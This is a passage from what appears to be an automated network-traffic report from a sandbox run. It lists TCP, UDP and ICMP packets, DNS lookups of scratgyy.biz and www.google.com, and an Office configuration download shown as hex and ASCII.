Oct 27, 2024 17:04:57.100677013 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.100691080 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.100869894 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.100881100 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.101062059 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.101073027 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.101253033 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.101264000 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.101447105 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.101457119 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.101635933 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.101645947 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.101828098 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.101843119 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102020025 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102030039 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102215052 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102225065 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102402925 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102411985 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102600098 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102612019 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102787971 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102798939 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.102981091 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.102993011 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.103173018 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.103183031 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.103363991 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.103374004 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.103562117 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.103571892 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.103754044 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.103765011 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.103946924 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.103959084 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.104139090 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.104151964 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.104332924 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.104348898 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.104521990 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.104533911 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.104721069 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.104738951 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.104902983 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.104914904 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.105096102 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.105113983 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.105276108 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.105470896 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.105659008 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.105850935 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106031895 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106229067 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106416941 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106606007 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106798887 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.106987953 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.107183933 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.107374907 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.107568979 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.107758045 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.107950926 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.108150959 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.108335018 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.108526945 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.108711004 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152018070 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.152210951 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152229071 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.152261972 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152271032 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.152309895 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152318001 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.152508974 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152522087 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.152698040 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.152893066 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.153080940 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.153275013 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.153466940 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.153656960 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.195970058 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.294872046 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.295052052 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.295196056 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.295366049 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.297593117 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.297635078 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.297800064 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.297997952 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.298019886 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.499640942 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.499855995 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.500744104 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.500770092 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.501279116 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:59.502557993 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.502587080 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:59.502679110 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:05:00.000457048 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:05:00.000638008 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:05:00.000778913 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:05:00.000971079 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:05:00.000972033 CET	49772	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:05:00.001003981 CET	443	49772	104.21.64.165	192.168.11.20
Oct 27, 2024 17:05:00.001013041 CET	443	49772	104.21.64.165	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 17:03:05.301110983 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:03:06.065668106 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:03:06.831298113 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:03:16.484188080 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:03:17.243561983 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:03:18.009018898 CET	137	137	192.168.11.20	192.168.11.255
Oct 27, 2024 17:04:31.710937977 CET	57057	53	192.168.11.20	1.1.1.1
Oct 27, 2024 17:04:31.814039946 CET	53	57057	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:36.542797089 CET	53	54504	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:36.643397093 CET	54200	1900	192.168.11.20	239.255.255.250
Oct 27, 2024 17:04:36.704616070 CET	53	54199	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:36.832895994 CET	55358	53	192.168.11.20	1.1.1.1
Oct 27, 2024 17:04:36.833002090 CET	61749	53	192.168.11.20	1.1.1.1
Oct 27, 2024 17:04:36.927440882 CET	53	61749	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:36.927772999 CET	53	55358	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:37.383683920 CET	53	60306	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:37.647543907 CET	54200	1900	192.168.11.20	239.255.255.250
Oct 27, 2024 17:04:38.657028913 CET	54200	1900	192.168.11.20	239.255.255.250
Oct 27, 2024 17:04:39.668564081 CET	54200	1900	192.168.11.20	239.255.255.250
Oct 27, 2024 17:04:40.780822039 CET	53	58700	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:45.785746098 CET	53	51746	9.9.9.9	192.168.11.20
Oct 27, 2024 17:04:55.731486082 CET	53	62533	1.1.1.1	192.168.11.20
Oct 27, 2024 17:04:58.848501921 CET	58831	53	192.168.11.20	1.1.1.1
Oct 27, 2024 17:04:58.955179930 CET	53	58831	1.1.1.1	192.168.11.20
Oct 27, 2024 17:05:05.771847963 CET	53	56922	1.1.1.1	192.168.11.20
Oct 27, 2024 17:05:13.799139977 CET	51547	53	192.168.11.20	1.1.1.1
Oct 27, 2024 17:05:13.904625893 CET	53	51547	1.1.1.1	192.168.11.20
Oct 27, 2024 17:05:20.472197056 CET	53	53723	1.1.1.1	192.168.11.20

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 27, 2024 17:04:45.785937071 CET	192.168.11.20	9.9.9.9	db52	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 27, 2024 17:04:31.710937977 CET	192.168.11.20	1.1.1.1	0x830a	Standard query (0)	scratgyy.biz	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:36.832895994 CET	192.168.11.20	1.1.1.1	0xc924	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:36.833002090 CET	192.168.11.20	1.1.1.1	0x6be1	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 27, 2024 17:04:58.848501921 CET	192.168.11.20	1.1.1.1	0xe325	Standard query (0)	scratgyy.biz	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:05:13.799139977 CET	192.168.11.20	1.1.1.1	0x2afb	Standard query (0)	scratgyy.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 27, 2024 17:04:31.814039946 CET	1.1.1.1	192.168.11.20	0x830a	No error (0)	scratgyy.biz	104.21.64.165	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:31.814039946 CET	1.1.1.1	192.168.11.20	0x830a	No error (0)	scratgyy.biz	172.67.152.243	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:36.927440882 CET	1.1.1.1	192.168.11.20	0x6be1	No error (0)	www.google.com		65	IN (0x0001)	false
Oct 27, 2024 17:04:36.927772999 CET	1.1.1.1	192.168.11.20	0xc924	No error (0)	www.google.com	142.251.40.100	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:58.955179930 CET	1.1.1.1	192.168.11.20	0xe325	No error (0)	scratgyy.biz	104.21.64.165	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:04:58.955179930 CET	1.1.1.1	192.168.11.20	0xe325	No error (0)	scratgyy.biz	172.67.152.243	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:05:13.904625893 CET	1.1.1.1	192.168.11.20	0x2afb	No error (0)	scratgyy.biz	172.67.152.243	A (IP address)	IN (0x0001)	false
Oct 27, 2024 17:05:13.904625893 CET	1.1.1.1	192.168.11.20	0x2afb	No error (0)	scratgyy.biz	104.21.64.165	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ecs.office.com

scratgyy.biz

www.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.11.20	49744	52.113.194.132	443

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:03:30 UTC	601	OUT	GET /config/v2/Office/officeclicktorun/16.0.14326.20384/Production/CC?&Clientid=%7bB0D7ECDF-3EEF-4767-BB67-27861CCFA721%7d&Application=officeclicktorun&Platform=win32&Version=16.0.14326.20384&MsoVersion=16.0.14326.20384&Audience=Production&Build=ship&Architecture=x64&OsVersion=10.0&OsBuild=19042&Channel=CC&InstallType=C2R&SessionId=%7b416D32E9-EAB1-474A-BE66-27112055BEE5%7d&LabMachine=false HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip If-None-Match: "vbfTVf/bCysSx4WnMqc2RY2GVSYWfpgdMSpIVEM4P5Q=" User-Agent: Microsoft Office 2014 DisableExperiments: false Host: ecs.office.com
2024-10-27 16:03:30 UTC	846	IN	HTTP/1.1 200 OK Cache-Control: no-cache,max-age=43200 Content-Length: 70854 Content-Type: application/json Expires: Mon, 28 Oct 2024 04:03:30 GMT ETag: "H1tbFlvP/zAoXL439EPPE5BpK6rstL75MVuAb0IdBAI=" X-Content-Type-Options: nosniff X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; includeSubDomains Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=Edge-Prod-TEB31r4a&FrontEnd=AFD"}],"include_subdomains":true} NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 7D55DDF585524ED1AA3EA63A91EADD8B Ref B: TEB31EDGE0108 Ref C: 2024-10-27T16:03:30Z Date: Sun, 27 Oct 2024 16:03:30 GMT Connection: close
2024-10-27 16:03:30 UTC	3350	IN	Data Raw: 7b 22 45 43 53 22 3a 7b 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 44 69 73 61 62 6c 65 43 6f 6e 66 69 67 4c 6f 67 22 3a 74 72 75 65 2c 22 43 61 63 68 65 45 78 70 69 72 79 49 6e 4d 69 6e 22 3a 37 32 30 2c 22 45 6e 61 62 6c 65 53 6d 61 72 74 45 54 61 67 22 3a 31 2c 22 43 6f 6e 66 69 67 49 64 44 65 6c 69 6d 69 74 65 72 49 6e 4c 6f 67 22 3a 22 3b 22 7d 2c 22 4e 61 6e 63 79 4f 66 66 69 63 65 54 65 61 6d 22 3a 7b 22 7a 68 65 74 61 6e 34 31 32 32 30 32 31 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 41 63 63 65 73 73 22 3a 7b 22 44 6f 6e 74 52 65 69 6e 69 74 69 61 6c 69 7a 65 4d 73 6f 22 3a 66 61 6c 73 65 2c 22 46 69 6c 74 65 72 4f 44 61 74 61 53 79 73 74 65 6d 43 6f 6c 75 6d 6e 73 22 3a 66 61 6c 73 65 7d 2c 22 4f Data Ascii: {"ECS":{"ConfigLogTarget":"default","DisableConfigLog":true,"CacheExpiryInMin":720,"EnableSmartETag":1,"ConfigIdDelimiterInLog":";"},"NancyOfficeTeam":{"zhetan4122021":true},"Office_Access":{"DontReinitializeMso":false,"FilterODataSystemColumns":false},"O
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 62 6c 65 64 43 6c 6f 73 65 49 6e 41 6c 65 72 74 22 3a 74 72 75 65 2c 22 50 6f 77 65 72 51 75 65 72 79 41 76 6f 69 64 4f 76 65 72 72 69 64 65 46 69 6c 6c 53 65 73 73 69 6f 6e 4d 61 73 68 75 70 52 65 73 6f 75 72 63 65 22 3a 74 72 75 65 2c 22 41 75 74 6f 52 65 66 72 65 73 68 49 64 6c 65 54 69 6d 65 54 68 72 65 73 68 6f 6c 64 4d 73 22 3a 36 30 30 30 30 30 2c 22 4f 63 73 4d 65 72 67 65 41 62 6f 72 74 41 75 74 6f 73 61 76 65 22 3a 74 72 75 65 2c 22 45 6e 61 62 6c 65 45 32 6f 42 6f 75 6e 64 73 4d 69 6e 4d 61 78 43 61 63 68 65 22 3a 74 72 75 65 2c 22 4c 65 61 63 79 57 65 62 49 45 31 31 53 75 70 70 6f 72 74 22 3a 74 72 75 65 2c 22 49 6e 73 69 67 68 74 73 2e 50 69 76 6f 74 54 61 62 6c 65 52 65 63 6f 6d 6d 65 6e 64 65 72 52 61 6e 6b 65 72 56 32 22 3a 22 44 65 66 65 Data Ascii: bledCloseInAlert":true,"PowerQueryAvoidOverrideFillSessionMashupResource":true,"AutoRefreshIdleTimeThresholdMs":600000,"OcsMergeAbortAutosave":true,"EnableE2oBoundsMinMaxCache":true,"LeacyWebIE11Support":true,"Insights.PivotTableRecommenderRankerV2":"Defe
2024-10-27 16:03:30 UTC	4144	IN	Data Raw: 65 22 3a 7b 22 4d 61 70 57 68 69 74 65 54 6f 4f 66 66 57 68 69 74 65 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 4f 75 74 6c 6f 6f 6b 22 3a 7b 22 50 63 78 2e 50 63 78 4d 61 70 69 55 73 61 67 65 46 69 78 65 73 22 3a 74 72 75 65 2c 22 50 63 78 2e 4c 69 6e 6b 65 64 49 6e 4b 32 46 69 78 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 50 65 72 66 6f 72 6d 61 6e 63 65 22 3a 7b 22 49 6e 70 75 74 44 65 6c 61 79 4d 6f 6e 69 74 6f 72 2e 49 4f 48 6f 6f 6b 73 52 69 70 63 6f 72 64 22 3a 66 61 6c 73 65 2c 22 42 6c 6f 63 6b 69 6e 67 57 61 69 74 73 2e 4f 73 72 50 72 6f 63 65 73 73 22 3a 66 61 6c 73 65 7d 2c 22 4f 66 66 69 63 65 5f 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 3a 7b 22 47 72 6f 75 70 46 65 61 74 75 72 65 22 3a 7b 22 45 6e 61 62 6c 65 43 61 6e 63 65 Data Ascii: e":{"MapWhiteToOffWhite":true},"Office_Outlook":{"Pcx.PcxMapiUsageFixes":true,"Pcx.LinkedInK2Fix":true},"Office_Performance":{"InputDelayMonitor.IOHooksRipcord":false,"BlockingWaits.OsrProcess":false},"Office_Personalization":{"GroupFeature":{"EnableCance
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 22 3a 34 38 38 39 36 7d 2c 22 49 6e 63 6f 73 69 73 74 65 6e 74 52 65 61 64 4f 6e 6c 79 44 6f 63 50 72 6f 70 65 72 74 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 2c 22 4f 43 53 42 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 56 63 6c 6f 6b 4f 6e 44 6f 63 44 69 73 70 6c 61 79 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 56 63 6c 6f 6b 4f 6e 53 61 76 65 43 6f 6d 70 6c 65 74 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 56 63 6c 6f 6b 4f 6e 55 70 6c 6f 61 64 43 6f 6d 70 6c 65 74 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 7d 7d 2c 22 53 61 76 65 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 43 6f 61 75 74 68 43 6f 6e 74 65 6e 74 4c 61 74 65 6e 63 79 49 6e 53 61 76 65 22 3a 7b 22 Data Ascii: ":48896},"IncosistentReadOnlyDocProperty":{"EventFlag":2}}},"OCSB":{"Events":{"VclokOnDocDisplay":{"EventFlag":48896},"VclokOnSaveComplete":{"EventFlag":48896},"VclokOnUploadComplete":{"EventFlag":48896}}},"Save":{"Events":{"CoauthContentLatencyInSave":{"
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 73 65 72 43 72 65 61 74 65 46 6c 65 78 4c 69 73 74 46 72 6f 6d 53 6e 61 70 73 68 6f 74 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 7d 7d 2c 22 43 6f 6c 6c 61 62 22 3a 7b 22 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 43 6f 61 75 74 68 6f 72 22 3a 7b 22 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 43 6f 61 75 74 68 6f 72 44 6f 63 75 6d 65 6e 74 48 65 6c 70 65 72 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 54 72 69 67 67 65 72 52 65 74 72 69 65 76 65 44 6f 63 75 6d 65 6e 74 43 6f 61 75 74 68 6f 72 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 52 65 74 72 69 65 76 65 45 64 69 74 6f 72 73 54 61 62 6c 65 4d 61 6e 61 67 65 72 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 35 31 32 7d 2c 22 52 65 74 72 69 65 76 65 52 74 Data Ascii: serCreateFlexListFromSnapshot":{"EventFlag":256}}},"Collab":{"SubNamespaces":{"Coauthor":{"SubNamespaces":{"CoauthorDocumentHelper":{"Events":{"TriggerRetrieveDocumentCoauthors":{"EventFlag":512},"RetrieveEditorsTableManager":{"EventFlag":512},"RetrieveRt
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 52 65 6d 6f 76 65 50 61 74 68 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 48 72 41 64 64 57 69 74 68 4f 70 74 69 6f 6e 73 57 69 74 68 43 6f 6e 74 65 78 74 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 2c 22 41 70 70 44 6f 63 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 44 6f 63 75 6d 65 6e 74 22 3a 7b 22 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 41 63 74 69 76 61 74 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 4c 61 73 74 4f 70 65 6e 65 64 44 6f 63 75 6d 65 6e 74 4d 65 74 61 64 61 74 61 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 7d 7d 2c 22 4d 6f 64 65 72 6e 44 6f 63 54 65 6d 70 6c 61 74 65 53 65 72 76 69 63 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 53 61 76 65 Data Ascii: RemovePath":{"EventFlag":2},"HrAddWithOptionsWithContext":{"EventFlag":2}}},"AppDocs":{"EventFlag":2},"Document":{"SubNamespaces":{"Activation":{"EventFlag":2},"LastOpenedDocumentMetadata":{"EventFlag":2}}},"ModernDocTemplateService":{"EventFlag":2},"Save
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 22 3a 32 7d 2c 22 43 68 65 63 6b 41 6e 64 55 70 64 61 74 65 41 6c 6c 53 64 78 53 6f 6c 75 74 69 6f 6e 73 54 61 73 6b 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 43 68 65 63 6b 41 6e 64 55 70 64 61 74 65 41 6c 6c 53 64 78 53 6f 6c 75 74 69 6f 6e 73 54 61 73 6b 52 65 67 69 73 74 65 72 53 6f 6c 75 74 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 43 68 65 63 6b 41 6e 64 55 70 64 61 74 65 41 6c 6c 53 64 78 53 6f 6c 75 74 69 6f 6e 73 54 61 73 6b 52 65 67 69 73 74 65 72 4e 65 75 74 72 61 6c 50 61 63 6b 61 67 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 43 68 65 63 6b 41 6e 64 55 70 64 61 74 65 41 6c 6c 53 64 78 53 6f 6c 75 74 69 6f 6e 73 54 61 73 6b 52 65 67 69 73 74 65 72 4c 6f 63 61 6c 65 50 61 63 6b 61 67 65 22 Data Ascii: ":2},"CheckAndUpdateAllSdxSolutionsTask":{"EventFlag":2},"CheckAndUpdateAllSdxSolutionsTaskRegisterSolution":{"EventFlag":2},"CheckAndUpdateAllSdxSolutionsTaskRegisterNeutralPackage":{"EventFlag":2},"CheckAndUpdateAllSdxSolutionsTaskRegisterLocalePackage"
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 53 75 62 4e 61 6d 65 73 70 61 63 65 73 22 3a 7b 22 43 65 6e 74 72 61 6c 54 61 62 6c 65 22 3a 7b 22 45 76 65 6e 74 73 22 3a 7b 22 43 68 65 63 6b 53 63 68 65 6d 61 56 65 72 73 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 43 6c 65 61 72 43 61 63 68 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 43 72 65 61 74 65 44 61 74 61 62 61 73 65 46 69 6c 65 55 73 69 6e 67 54 65 6d 70 6c 61 74 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 43 72 65 61 74 65 44 61 74 61 53 6f 75 72 63 65 46 61 69 6c 75 72 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 38 39 36 7d 2c 22 44 61 74 61 73 6f 75 72 63 65 4f 70 65 6e 46 61 69 6c 75 72 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 34 38 Data Ascii: SubNamespaces":{"CentralTable":{"Events":{"CheckSchemaVersion":{"EventFlag":48896},"ClearCache":{"EventFlag":48896},"CreateDatabaseFileUsingTemplate":{"EventFlag":48896},"CreateDataSourceFailure":{"EventFlag":48896},"DatasourceOpenFailure":{"EventFlag":48
2024-10-27 16:03:30 UTC	8192	IN	Data Raw: 22 53 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 7d 2c 22 48 74 6d 6c 50 72 65 66 65 74 63 68 52 65 71 75 65 73 74 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 52 65 66 72 65 73 68 43 61 63 68 65 64 46 69 6c 65 73 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 44 6f 77 6e 6c 6f 61 64 52 65 73 6f 75 72 63 65 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 52 65 73 75 6c 74 47 72 6f 75 70 54 6f 52 65 6e 64 65 72 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 53 65 6e 64 57 65 62 53 6f 63 6b 65 74 52 65 71 75 65 73 74 22 3a 7b 22 45 76 65 6e 74 46 6c 61 67 22 3a 32 35 36 7d 2c 22 57 65 Data Ascii: 